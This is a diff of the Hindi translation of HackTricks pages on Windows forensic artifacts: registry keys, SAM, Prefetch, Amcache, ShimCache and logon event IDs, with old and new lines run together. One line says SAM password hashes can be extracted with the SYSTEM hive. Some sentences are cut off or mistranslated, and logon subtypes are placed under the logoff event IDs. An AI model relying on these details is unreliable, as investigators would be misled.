### हटाए गए तत्व को पुनः प्राप्त करना ### हटाए गए तत्व को पुनः प्राप्त करना
जब एक कुंजी हटाई जाती है तो उसे ऐसा चिह्नित किया जाता है, लेकिन जब तक वह जगह जिसे वह धारण कर रही है आवश्यक नहीं होती, तब तक वह हटाया नहीं जाएगा। इसलिए, **रजिस्ट्री एक्सप्लोरर** जैसे उपकरण का उपयोग करके इन हटाए गए कुंजियों को पुनः प्राप्त किया जा सकता है। जब एक कुंजी हटाई जाती है तो उसे ऐसा चिह्नित किया जाता है, लेकिन जब तक वह जगह जिसे यह धारण कर रही है उसकी आवश्यकता न हो, तब तक यह हटाया नहीं जाएगा। इसलिए, **रजिस्ट्री एक्सप्लोरर** जैसे उपकरण का उपयोग करके इन हटाए गए कुंजियों को पुनः प्राप्त किया जा सकता है।
### अंतिम लेखन समय ### अंतिम लेखन समय
@ -263,9 +264,9 @@ Windows रजिस्ट्री, विभिन्न `HKEY_LOCAL_MACHINE`
### SAM ### SAM
फ़ाइल/हाइव **SAM** में सिस्टम के **उपयोगकर्ता, समूह और उपयोगकर्ता पासवर्ड** हैश संग्रहित होते हैं। फ़ाइल/हाइव **SAM** में सिस्टम के **उपयोगकर्ता, समूह और उपयोगकर्ता पासवर्ड** हैश होते हैं।
`SAM\Domains\Account\Users` में आप उपयोगकर्ता नाम, RID, अंतिम लॉगिन, अंतिम विफल लॉगिन, लॉगिन काउंटर, पासवर्ड नीति और खाता बनाया गया था की जानकारी प्राप्त कर सकते हैं। **हैश** प्राप्त करने के लिए आपको फ़ाइल/हाइव **SYSTEM** की भी **आवश्यकता** है। `SAM\Domains\Account\Users` में आप उपयोगकर्ता नाम, RID, अंतिम लॉगिन, अंतिम विफल लॉगिन, लॉगिन काउंटर, पासवर्ड नीति और खाता बनाया गया था कब तक प्राप्त कर सकते हैं। **हैश** प्राप्त करने के लिए आपको फ़ाइल/हाइव **SYSTEM** की भी **आवश्यकता** है।
### Windows रजिस्ट्री में दिलचस्प प्रविष्टियाँ ### Windows रजिस्ट्री में दिलचस्प प्रविष्टियाँ
@ -273,27 +274,27 @@ Windows रजिस्ट्री, विभिन्न `HKEY_LOCAL_MACHINE`
[interesting-windows-registry-keys.md](interesting-windows-registry-keys.md) [interesting-windows-registry-keys.md](interesting-windows-registry-keys.md)
{% endcontent-ref %} {% endcontent-ref %}
## निष्पादित कार्यक्रम ## कार्यक्रम निष्पादित
### मौलिक Windows प्रक्रियाएँ ### मौलिक Windows प्रक्रियाएँ
[इस पोस्ट](https://jonahacks.medium.com/investigating-common-windows-processes-18dee5f97c1d) में आप संदेहात्मक व्यवहार का पता लगाने के लिए सामान्य Windows प्रक्रियाओं के बारे में सीख सकते हैं। [इस पोस्ट](https://jonahacks.medium.com/investigating-common-windows-processes-18dee5f97c1d) में आप संदेहास्पद व्यवहार का पता लगाने के लिए सामान्य Windows प्रक्रियाओं के बारे में सीख सकते हैं।
### Windows हाल के APPs ### Windows हाल के APPs
रजिस्ट्री `NTUSER.DAT` में पथ `Software\Microsoft\Current Version\Search\RecentApps` में आप **निष्पादित एप्लिकेशन**, **अंतिम समय** जब यह निष्पादित किया गया था, और **कितनी बार** यह चलाया गया था के बारे में जानकारी संग्रहित करने वाली सबकीज हो सकती है रजिस्ट्री `NTUSER.DAT` में पथ `Software\Microsoft\Current Version\Search\RecentApps` में आप **एप्लिकेशन निष्पादित**, **अंतिम समय** जब यह निष्पादित किया गया था, और **कितनी बार** यह चलाया गया था के बारे में जानकारी वाले सबकीज प्राप्त कर सकते हैं
### BAM (पृष्ठभूमि गतिविधि नियंत्रक) ### BAM (पृष्ठभूमि गतिविधि नियंत्रक)
आप रजिस्ट्री संपादक के साथ `SYSTEM` फ़ाइल खोल सकते हैं और पथ `SYSTEM\CurrentControlSet\Services\bam\UserSettings\{SID}` में आप प्रत्येक उपयोगकर्ता द्वारा निष्पादित **एप्लिकेशन की जानकारी** (पथ में `{SID}` ध्यान दें) और **कब** वे निष्पादित किए गए थे (समय रजिस्ट्री के डेटा मान में होता है) प्राप्त कर सकते हैं। आप रजिस्ट्री संपादक के साथ `SYSTEM` फ़ाइल खोल सकते हैं और पथ `SYSTEM\CurrentControlSet\Services\bam\UserSettings\{SID}` में आप प्रत्येक उपयोगकर्ता द्वारा **निष्पादित एप्लिकेशन की जानकारी** (पथ में `{SID}` का ध्यान दें) और **कब** वे निष्पादित किए गए थे (समय रजिस्ट्री के डेटा मान में होता है) प्राप्त कर सकते हैं।
### Windows Prefetch ### Windows Prefetch
प्रीफेचिंग एक तकनीक है जो एक कंप्यूटर को चुपचाप **उसे आवश्यक संसाधन लाने की अनुमति देती है जो एक उपयोगकर्ता निकट भविष्य में पहुँच सकता है** ताकि संसाधन तेजी से पहुँचे जा सकें प्रीफेचिंग एक तकनीक है जो एक कंप्यूटर को चुपचाप **उन आवश्यक संसाधनों को लाने की अनुमति देती है जो एक उपयोगकर्ता निकट भविष्य में पहुँच सकता है** ताकि संसाधनों को तेजी से पहुँचा जा सके
Windows प्रीफेच में **निष्पादित कार्यक्रमों के कैश** बनाने से उन्हें तेजी से लोड करने की क्षमता होती है। ये कैशेज `.pf` फ़ाइलें बनाते हैं पथ में: `C:\Windows\Prefetch`। XP/VISTA/WIN7 में 128 फ़ाइलों की सीमा होती है और Win8/Win10 में 1024 फ़ाइलें होती हैं। Windows प्रीफेच में **निष्पादित कार्यक्रमों के कैश** बनाने से उन्हें तेजी से लोड करने की क्षमता होती है। ये कैशेज `.pf` फ़ाइलें बनाते हैं पथ में: `C:\Windows\Prefetch`। XP/VISTA/WIN7 में 128 फ़ाइलों की सीमा होती है और Win8/Win10 में 1024 फ़ाइलें होती हैं।
फ़ाइल नाम `{प्रोग्राम_नाम}-{हैश}.pf` के रूप में बनाई जाती है (हैश पथ और कार्यक्रम के तर्कों पर आधारित है)। W10 में ये फ़ाइलें संकुचित होती हैं। ध्यान दें कि फ़ाइल की केवल मौज फ़ाइल का नाम `{प्रोग्राम_नाम}-{हैश}.pf` बनाया जाता है (हैश पथ और कार्यक्रम के तर्कों पर आधारित है)। W10 में ये फ़ाइलें संकुचित होती हैं। ध्यान दें कि फ़ाइल की केवल मौजूदगी इस बात का संक
```bash ```bash
.\PECmd.exe -d C:\Users\student\Desktop\Prefetch --html "C:\Users\student\Desktop\out_folder" .\PECmd.exe -d C:\Users\student\Desktop\Prefetch --html "C:\Users\student\Desktop\out_folder"
``` ```
@ -310,11 +311,11 @@ Windows प्रीफेच में **निष्पादित कार
### SRUM ### SRUM
**सिस्टम रिसोर्स यूज़ेज मॉनिटर** (SRUM) **प्रक्रिया द्वारा उपयोग किए गए संसाधनों** का **निगरानी** करता है। यह W8 में प्रकट हुआ और डेटा को `C:\Windows\System32\sru\SRUDB.dat` में स्थित एक ESE डेटाबेस में संग्रहित करता है। **सिस्टम रिसोर्स उपयोग मॉनिटर** (SRUM) **प्रक्रिया द्वारा उपयोग किए गए संसाधनों** का **निगरानी** करता है। यह W8 में प्रकट हुआ और यह डेटा को `C:\Windows\System32\sru\SRUDB.dat` में स्थित एक ESE डेटाबेस में संग्रहित करता है।
यह निम्नलिखित जानकारी प्रदान करता है: यह निम्नलिखित जानकारी प्रदान करता है:
* एप्लिकेशन आईडी और पथ * ऐपआईडी और पथ
* प्रक्रिया को चलाने वाला उपयोगकर्ता * प्रक्रिया को चलाने वाला उपयोगकर्ता
* भेजे गए बाइट्स * भेजे गए बाइट्स
* प्राप्त बाइट्स * प्राप्त बाइट्स
@ -334,14 +335,14 @@ Windows प्रीफेच में **निष्पादित कार
- फ़ाइल का पूरा पथ - फ़ाइल का पूरा पथ
- फ़ाइल का आकार - फ़ाइल का आकार
- Last Modified time under **$Standard\_Information** (SI) - **$Standard\_Information** (SI) के तहत अंतिम संशोधित समय
- Last Updated time of the ShimCache - ShimCache का अंतिम अपडेट समय
- Process Execution Flag - प्रक्रिया निष्पादन ध्वज
Such data is stored within the registry at specific locations based on the version of the operating system: ऐसे डेटा को रजिस्ट्री में रखा जाता है विशेष स्थानों पर आधारित होता है ऑपरेटिंग सिस्टम के संस्करण पर:
- For XP, the data is stored under `SYSTEM\CurrentControlSet\Control\SessionManager\Appcompatibility\AppcompatCache` with a capacity for 96 entries. - XP के लिए, डेटा `SYSTEM\CurrentControlSet\Control\SessionManager\Appcompatibility\AppcompatCache` के तहत संग्रहीत होता है जिसमें 96 एंट्री की क्षमता होती है।
- उपसर्वर 2003 के लिए, साथ ही Windows संस्करण 2008, 2012, 2016, 7, 8, और 10 के लिए, स्टोरेज पथ `SYSTEM\CurrentControlSet\Control\SessionManager\AppcompatCache\AppCompatCache` है, जिसमें 512 और 1024 एंट्री को समाहित किया गया है। - सर्वर 2003, साथ ही Windows संस्करण 2008, 2012, 2016, 7, 8, और 10 के लिए, स्टोरेज पथ `SYSTEM\CurrentControlSet\Control\SessionManager\AppcompatCache\AppCompatCache`ोता है, जिसमें 512 और 1024 एंट्री की क्षमता होती है।
संग्रहित जानकारी को पार्स करने के लिए, [**AppCompatCacheParser** टूल](https://github.com/EricZimmerman/AppCompatCacheParser) का उपयोग करना सुझावित है। संग्रहित जानकारी को पार्स करने के लिए, [**AppCompatCacheParser** टूल](https://github.com/EricZimmerman/AppCompatCacheParser) का उपयोग करना सुझावित है।
@ -349,15 +350,15 @@ Such data is stored within the registry at specific locations based on the versi
### Amcache ### Amcache
**Amcache.hve** फ़ाइल मुख्य रूप से एक रजिस्ट्री हाइव है जो एक सिस्टम पर निष्पादित की गई एप्लिकेशनों के विवरण को लॉग करता है। आमतौर पर यह `C:\Windows\AppCompat\Programas\Amcache.hve` पर पाया जाता है। **Amcache.hve** फ़ाइल मूल रूप से एक रजिस्ट्री हाइव है जो एक सिस्टम पर निष्पादित की गई एप्लिकेशनों के बारे में विवरण लॉग करता है। यह सामान्यत: `C:\Windows\AppCompat\Programas\Amcache.hve` पर पाया जाता है।
यह फ़ाइल हाल ही में निष्पादित प्रक्रियाओं के रिकॉर्ड संग्रहित करने के लिए महत्वपूर्ण है, जिसमें निष्पादनी फ़ाइलों के पथ और उनके SHA1 हैश शामिल हैं। यह जानकारी सिस्टम पर एप्लिकेशनों की गतिविधि का ट्रैकिंग करने के लिए अमूल्य है। यह फ़ाइल हाल ही में निष्पादित प्रक्रियाओं के रिकॉर्ड संग्रहित करने के लिए प्रमुख है, जिसमें निष्पादनी फ़ाइलों के पथ और उनके SHA1 हैश शामिल हैं। यह जानकारी सिस्टम पर एप्लिकेशनों की गतिविधि का ट्रैकिंग करने के लिए अमूल्य है।
**Amcache.hve** से डेटा निकालने और विश्लेषण करने के लिए, [**AmcacheParser**](https://github.com/EricZimmerman/AmcacheParser) टूल का उपयोग किया जा सकता है। निम्नलिखित कमांड एक उदाहरण है कि AmcacheParser का उपयोग कैसे किया जा **Amcache.hve** फ़ाइल की सामग्री को पार्स करने और परिणामों को CSV प्रारूप में निकालने के लिए: **Amcache.hve** से डेटा निकालने और विश्लेषण करने के लिए, [**AmcacheParser**](https://github.com/EricZimmerman/AmcacheParser) टूल का उपयोग किया जा सकता है। निम्नलिखित कमांड एक उदाहरण है कि AmcacheParser का उपयोग कैसे किया जाता है **Amcache.hve** फ़ाइल की सामग्री को पार्स करने और परिणामों को CSV प्रारूप में आउटपुट करने के लिए:
```bash ```bash
AmcacheParser.exe -f C:\Users\genericUser\Desktop\Amcache.hve --csv C:\Users\genericUser\Desktop\outputFolder AmcacheParser.exe -f C:\Users\genericUser\Desktop\Amcache.hve --csv C:\Users\genericUser\Desktop\outputFolder
``` ```
में उत्पन्न CSV फ़ाइलों में, `Amcache_Unassociated file entries` विशेष रूप से महत्वपूर्ण है क्योंकि यह असंबद्ध फ़ाइल प्रविष्टियों के बारे में विविध जानकारी प्रदान करता है। में उत्पन्न CSV फ़ाइलों में, `Amcache_Unassociated file entries` विशेष रूप से महत्वपूर्ण है क्योंकि यह असंबद्ध फ़ाइल प्रविष्टियों के बारे में विस्तृत जानकारी प्रदान करता है।
सबसे दिलचस्प CVS फ़ाइल जो उत्पन्न होती है, वह है `Amcache_Unassociated file entries` सबसे दिलचस्प CVS फ़ाइल जो उत्पन्न होती है, वह है `Amcache_Unassociated file entries`
@ -377,40 +378,68 @@ AmcacheParser.exe -f C:\Users\genericUser\Desktop\Amcache.hve --csv C:\Users\gen
### **Windows Store** ### **Windows Store**
स्थापित एप्लिकेशन `\ProgramData\Microsoft\Windows\AppRepository\` में पाए जा सकते हैं। स्थापित एप्लिकेशन `\ProgramData\Microsoft\Windows\AppRepository\` में पाई जा सकती हैं।
इस भंडार में एक **लॉग** है जिसमें प्रत्येक एप्लिकेशन की स्थापना की गई है जो तंत्र में है डेटाबेस **`StateRepository-Machine.srd`**। इस भंडार में एक **लॉग** है जिसमें प्रत्येक एप्लिकेशन की स्थापना की गई है जो डेटाबेस **`StateRepository-Machine.srd`** के अंदर सिस्टम में
इस डेटाबेस के एप्लिकेशन तालिका में, "एप्लिकेशन आईडी", "पैकेज नंबर", और "प्रदर्शन नाम" मिल सकते हैं। ये स्तंभ पूर्व स्थापित और स्थापित एप्लिकेशनों के बारे में जानकारी रखते हैं और यह पता लगाया जा सकता है कि क्या कुछ एप्लिकेशन अनइंस्टॉल किए गए थे क्योंकि स्थापित एप्लिकेशनों के आईडी सतत होने चाहिए। इस डेटाबेस के एप्लिकेशन तालिका के अंदर, "एप्लिकेशन आईडी", "पैकेज नंबर", और "प्रदर्शन नाम" पाए जा सकते हैं। ये स्तंभ पूर्व स्थापित और स्थापित एप्लिकेशनों के बारे में जानकारी रखते हैं और यह पता लगाया जा सकता है कि क्या कुछ एप्लिकेशन अनइंस्टॉल किए गए थे क्योंकि स्थापित एप्लिकेशनों के आईडी सतत होने चाहिए।
रजिस्ट्री पथ में भी स्थापित एप्लिकेशन पाए जा सकते हैं: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Applications\`\ रजिस्ट्री पथ के अंदर भी **स्थापित एप्लिकेशन** पाए जा सकते हैं: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Applications\`\
और **अनइंस्टॉल** **एप्लिकेशन** में: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Deleted\` और **अनइंस्टॉल** **एप्लिकेशन** में: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Deleted\`
## Windows घटनाए ## Windows घटनाए
Windows घटनाओं में जो जानकारी दिखाई देती है: Windows घटनाओं के अंदर जो जानकारी आती है:
* क्या हुआ * क्या हुआ
* टाइमस्टैम्प (UTC + 0) * टाइमस्टैम्प (UTC + 0)
* शामिल हुए उपयोगकर्ता * शामिल हुए उपयोगकर्ता
* शामिल हुए होस्ट (होस्टनाम, आईपी) * शामिल हुए होस्ट (होस्टनाम, आईपी)
* पहुंचे गए संपत्तिय (फ़ाइलें, फ़ोल्डर, प्रिंटर, सेवाए) * एसेट्स तक पहुंचा (फ़ाइलें, फ़ोल्डर, प्रिंटर, सेवाए)
लॉग `C:\Windows\System32\config` में पहले Windows Vista से पहले और `C:\Windows\System32\winevt\Logs` में Windows Vista के बाद स्थित हैं। Windows Vista से पहले, इवेंट लॉग बाइनरी प्रारूप में थे और इसके बाद, वे **XML प्रारूप** में हैं और **.evtx** एक्सटेंशन का उपयोग करते हैं। लॉग `C:\Windows\System32\config` में पहले Windows Vista से पहले और `C:\Windows\System32\winevt\Logs` में Windows Vista के बाद स्थित हैं। Windows Vista से पहले, इवेंट लॉग्स बाइनरी प्रारूप में थे और इसके बाद, वे **XML प्रारूप** में हैं और **.evtx** एक्सटेंशन का उपयोग करते हैं।
इवेंट फ़ाइलों की स्थिति सिस्टम रजिस्ट्री में मिल सकती है **`HKLM\SYSTEM\CurrentControlSet\services\EventLog\{Application|System|Security}`** इवेंट फ़ाइलों की स्थिति को **`HKLM\SYSTEM\CurrentControlSet\services\EventLog\{Application|System|Security}`** में पा सकते हैं
इन्हें Windows इवेंट व्यूअर (**`eventvwr.msc`**) से देखा जा सकता है या [**इवेंट लॉग एक्सप्लोरर**](https://eventlogxp.com) **या** [**Evtx एक्सप्लोरर/EvtxECmd**](https://ericzimmerman.github.io/#!index.md)** जैसे अन्य उपकरणों के साथ।** इन्हें Windows इवेंट व्यूअर (**`eventvwr.msc`**) से देखा जा सकता है या [**Event Log Explorer**](https://eventlogxp.com) जैसे अन्य उपकरणों के साथ देखा जा सकता है **या** [**Evtx Explorer/EvtxECmd**](https://ericzimmerman.github.io/#!index.md)**।**
## Windows सुरक्षा इवेंट लॉगिंग को समझना ## Windows सुरक्षा इवेंट लॉगिंग को समझना
सुरक्षा विन्यास फ़ाइल में एक्सेस इवेंट रिकॉर्ड किए जाते हैं जो `C:\Windows\System32\winevt\Security.evtx` में स्थित है। इस फ़ाइल का आकार समायोज्य है, और जब इसकी क्षमता पूरी हो जाती है, पुराने इवेंट ओवरराइट हो जाते हैं। रिकॉर्ड किए गए इवेंट में उपयोगकर्ता लॉगिन और लॉगऑफ, उपयोगकर्ता क्रियाएँ, और सुरक्षा सेटिंग्स में परिवर्तनों के साथ, साथ ही फ़ाइल, फ़ोल्डर, और साझा संपत्ति एक्सेस भी शामिल हैं। सुरक्षा विन्यास फ़ाइल में एक्सेस इवेंट रिकॉर्ड किए जाते हैं जो `C:\Windows\System32\winevt\Security.evtx` में स्थित है। इस फ़ाइल का आकार समायोज्य है, और जब इसकी क्षमता पूरी हो जाती है, पुराने इवेंट ओवरराइट हो जाते हैं। रिकॉर्ड किए गए इवेंट में उपयोगकर्ता लॉगिन और लॉगआउट, उपयोगकर्ता क्रियाएँ, और सुरक्षा सेटिंग्स में परिवर्तन, साथ ही फ़ाइल, फ़ोल्डर, और साझा एसेट एक्सेस भी शामिल हैं।
### उपयोगकर्ता प्रमाणीकरण के लिए मुख्य इवेंट आईडी: ### उपयोगकर्ता प्रमाणीकरण के लिए मुख्य इवेंट आईडी:
- **EventID 4624**: उपयोगकर्ता सफलतापूर्वक प्रमाणीकृत है। - **इवेंट आईडी 4624**: उपयोगकर्ता सफलतापूर्वक प्रमाणीकृत है।
- **EventID 4625**: प्रमाणीकरण विफलता की संकेत देता है। - **इवेंट आईडी 4625**: प्रमाणीकरण विफलता की संकेत देता है।
- **EventIDs 4634/4647**: उपयोगकर्ता लॉगऑफ इवेंट को प्रस्तुत करता है। - **इवेंट आईडी 4634/4647**: उपयोगकर्ता लॉगआउट इवेंट को प्रस्तुत करता है।
- **EventID 4672**: प्रबंधनीय विशेषाधिकारों के साथ लॉगिन को दर्शाता है। - **इवेंट आईडी 4672**: प्रबंधनीय विशेषाधिकारों के साथ लॉगिन को दर्शाता है।
#### इवेंट आईडी 4634/4647 के अंदर उप-प्रकार:
- **इंटरैक्टिव (2)**: सीधे उपयोगकर्ता लॉगिन।
- **नेटवर्क (3)**: साझा फ़ोल्डरों तक पहुंच।
- **बैच (4)**: बैच प्रक्रियाओं का क्रियान्वयन।
- **सेवा (5)**: सेवा लॉन्च।
- **प्रॉक्सी (6)**: प्रॉक्सी प्रमाणीकरण।
- **अनलॉक (7)**: पासवर्ड के साथ स्क्रीन अनलॉक।
- **नेटवर्क क्लियरटेक्स्ट (8)**: क्लियर टेक्स्ट पासवर्ड प्रसारण, अक्सर IIS से।
- **नए प्रमाणीकरण (9)**: पहुंच के लिए विभिन्न प्रमाणीकरण का उपयोग।
- **रिमोट इंटरैक्टिव (10)**: रिमोट डेस्कटॉप या टर्मिनल सेवाओं लॉगिन।
- **कैश इंटरैक्टिव (11)**: डोमेन कंट्रोलर से संपर्क के बिना कैश उपयोगकर्ता पहुंच।
- **कैश रिमोट इंटरैक्टिव (12)**: कैश उपयोगकर्ता पहुंच के साथ रिमोट लॉगिन।
- **कैश अनलॉक (13)**: कैश उपयोगकर्ता पहुंच के साथ अनलॉक।
#### इवेंट आईडी 4625 के लिए स्थिति और उप-स्थिति कोड:
- **0xC0000064**: उपयोगकर्ता नाम मौजूद नहीं है - उपयोगकर्ता नाम जांच आक्रमण का संकेत हो सकता है।
- **0xC000006A**: सही उपयोगकर्ता नाम लेकिन गलत पासवर्ड - संभावित पासवर्ड अनुमान या ब्रूट-फोर्स प्रयास।
- **0xC0000234**: उपयोगकर्ता खाता लॉकआउट - एक ब्रूट-फोर्स आक्रमण के परिणामस्वरूप कई विफल लॉगिन के बाद।
- **0xC0000072**: खाता निषेधित - निषेधित खातों तक पहुंच के अनधिकृत प्रयास।
- **0xC000006F**: अनुमति समय के बाहर लॉगिन - अनधिकृत पहुंच के संकेत के रूप में सेट लॉगिन घंटों के बाहर पहुंच के प्रयास।
- **0xC0000070**: कार्यस्थल प्रतिबंधों का उल्लंघन - अनधिकृत स्थान से लॉगिन का प्रयास।
- **0xC0000193**: खाता समाप्ति - समाप्त हो चुके उपयोगकर्ता खातों के साथ पहुंच के प्रयास।
- **0xC0000071**: समाप्त पासवर्ड - पुराने पासवर्ड के साथ लॉगिन के प्रयास।
- **0xC0000133**: समय सिंक समस्याएँ - ग्राहक और सर्वर के बीच बड़े समय अंतर के बीच अधिक विकसित आक्रमणों का संकेत हो सकता है जैसे पास-द-टिकट।
- **0xC0000224**: अनिवार्य पासवर्ड पर
#### सिस्टम पावर इवेंट्स #### सिस्टम पावर इवेंट्स
इवेंटआईडी 6005 सिस्टम स्टार्टअप को दर्शाता है, जबकि इवेंटआईडी 6006 शटडाउन को चिह्नित करता है। इवेंटआईडी 6005 सिस्टम स्टार्टअप को दर्शाता है, जबकि इवेंटआईडी 6006 शटडाउन को चिह्नित करता है।

View file

@ -2,20 +2,20 @@
### दिलचस्प Windows रजिस्ट्री कुंजी ### दिलचस्प Windows रजिस्ट्री कुंजी
{% hint style="success" %}
AWS हैकिंग सीखें और अभ्यास करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें।
* यदि आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड** करें तो [**सदस्यता योजनाएं देखें**](https://github.com/sponsors/carlospolop)! * **हैकिंग ट्रिक्स साझा करें, पीआर जमा करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
* प्राप्त करें [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com)
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर **फॉलो** करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details> </details>
{% endhint %}
### **Windows संस्करण और मालिक जानकारी** ### **Windows संस्करण और मालिक जानकारी**
- **`Software\Microsoft\Windows NT\CurrentVersion`** पर स्थित है, आपको Windows संस्करण, सेवा पैक, स्थापना समय, और पंजीकृत मालिक का नाम सीधे ढंग से मिलेगा। - **`Software\Microsoft\Windows NT\CurrentVersion`** पर स्थित है, आपको Windows संस्करण, सेवा पैक, स्थापना समय, और पंजीकृत मालिक का नाम सीधे ढंग से मिलेगा।
@ -24,45 +24,45 @@ HackTricks का समर्थन करने के अन्य तरी
- होस्टनाम **`System\ControlSet001\Control\ComputerName\ComputerName`** के तहत पाया जाता है। - होस्टनाम **`System\ControlSet001\Control\ComputerName\ComputerName`** के तहत पाया जाता है।
### **समय क्षेत्र सेटिंग** ### **समय क्षेत्र सेटिंग**
- सिस्टम का समय क्षेत्र **`System\ControlSet001\Control\TimeZoneInformation`** में संग्रहित है। - सिस्टम का समय क्षेत्र **`System\ControlSet001\Control\TimeZoneInformation`** में संग्रहित होता है।
### **पहुंच समय ट्रैकिंग** ### **पहुंच समय ट्रैकिंग**
- डिफ़ॉल्ट रूप से, अंतिम पहुंच समय ट्रैकिंग बंद होत है (**`NtfsDisableLastAccessUpdate=1`**). इसे सक्षम करने के लिए, इस्तेमाल करें: - डिफ़ॉल्ट रूप से, अंतिम पहुंच समय ट्रैकिंग बंद होत है (**`NtfsDisableLastAccessUpdate=1`**). इसे सक्षम करने के लिए, इस्तेमाल करें:
`fsutil behavior set disablelastaccess 0` `fsutil behavior set disablelastaccess 0`
### Windows संस्करण और सेवा पैक ### Windows संस्करण और सेवा पैक
- **Windows संस्करण** में संस्करण (जैसे, होम, प्रो) और इसका रिलीज (जैसे, Windows 10, Windows 11) दिखाता है, जबकि **सेवा पैक** में सुधार और कभी-कभी नए विशेषताएँ शामिल होती हैं। - **Windows संस्करण** संस्करण (जैसे, होम, प्रो) और इसका रिलीज (जैसे, Windows 10, Windows 11) को दर्शाता है, जबकि **सेवा पैक** अपडेट हैं जिसमें सुधार और कभी-कभी नए सुविधाएँ शामिल होती हैं।
### अंतिम पहुंच समय सक्षम करना ### अंतिम पहुंच समय सक्षम करना
- अंतिम पहुंच समय ट्रैकिंग सक्षम करने से आप देख सकते हैं कि फ़ाइलें कब आखिरी बार खोली गई थीं, जो जांच या सिस्टम मॉनिटरिंग के लिए महत्वपूर्ण हो सकता है। - अंतिम पहुंच समय ट्रैकिंग को सक्षम करने से आप देख सकते हैं कि फ़ाइलें कब आखिरी बार खोली गई थीं, जो फोरेंसिक विश्लेषण या सिस्टम मॉनिटरिंग के लिए महत्वपूर्ण हो सकता है।
### नेटवर्क सूचना विवरण ### नेटवर्क सूचना विवरण
- रजिस्ट्री में नेटवर्क कॉन्फ़िगरेशन पर व्यापक डेटा होता है, जिसमें **नेटवर्क के प्रकार (वायरलेस, केबल, 3जी)** और **नेटवर्क श्रेणियाँ (सार्वजनिक, निजी/घर, डोमेन/काम)** शामिल हैं, जो नेटवर्क सुरक्षा सेटिंग्स और अनुमतियों को समझने के लिए महत्वपूर्ण हैं। - रजिस्ट्री में नेटवर्क कॉन्फ़िगरेशन पर व्यापक डेटा होता है, जिसमें **नेटवर्क के प्रकार (वायरलेस, केबल, 3जी)** और **नेटवर्क श्रेणियाँ (सार्वजनिक, निजी/घर, डोमेन/काम)** शामिल हैं, जो नेटवर्क सुरक्षा सेटिंग्स और अनुमतियों को समझने के लिए महत्वपूर्ण हैं।
### क्लाइंट साइड कैशिंग (CSC) ### क्लाइंट साइड कैशिंग (CSC)
- **CSC** साझा फ़ाइलों का कैशिंग करके ऑफ़लाइन फ़ाइल एक्सेस को बढ़ाता है। विभिन्न **CSCFlags** सेटिंग्स नियंत्रित करती हैं कि कैसे और कौन सी फ़ाइलें कैश होती हैं, प्रदर्शन और उपयोगकर्ता अनुभव पर प्रभाव डालती हैं, खासकर उन परिस्थितियों में जहां अंतरिक्षिक कनेक्टिविटी हो - **CSC** साझा फ़ाइलों का कैशिंग करके ऑफ़लाइन फ़ाइल एक्सेस को बढ़ाता है। विभिन्न **CSCFlags** सेटिंग्स नियंत्रित करती हैं कि कैसे और कौन सी फ़ाइलें कैश होती हैं, प्रदर्शन और उपयोगकर्ता अनुभव पर प्रभाव डालती हैं, विशेष रूप से अंतरिक्ष से जुड़े परिस्थितियों में
### ऑटोस्टार्ट प्रोग्राम ### ऑटोस्टार्ट प्रोग्राम
- विभिन्न `Run` और `RunOnce` रजिस्ट्री कुंजी में सूचीबद्ध प्रोग्राम स्वचालित रूप से स्टार्टअप पर लॉन्च होते हैं, सिस्टम बूट समय पर प्रभाव डालते हैं और मालवेयर या अवांछित सॉफ़्टवेयर की पहचान के लिए महत्वपूर्ण बिंदु हो सकते हैं। - विभिन्न `Run` और `RunOnce` रजिस्ट्री कुंजी में सूचीबद्ध प्रोग्राम स्वचालित रूप से स्टार्टअप पर लॉन्च होते हैं, सिस्टम बूट समय पर प्रभाव डालते हैं और मालवेयर या अवांछित सॉफ़्टवेयर की पहचान के लिए महत्वपूर्ण बिंदु हो सकते हैं।
### शेलबैग्स ### शेलबैग्स
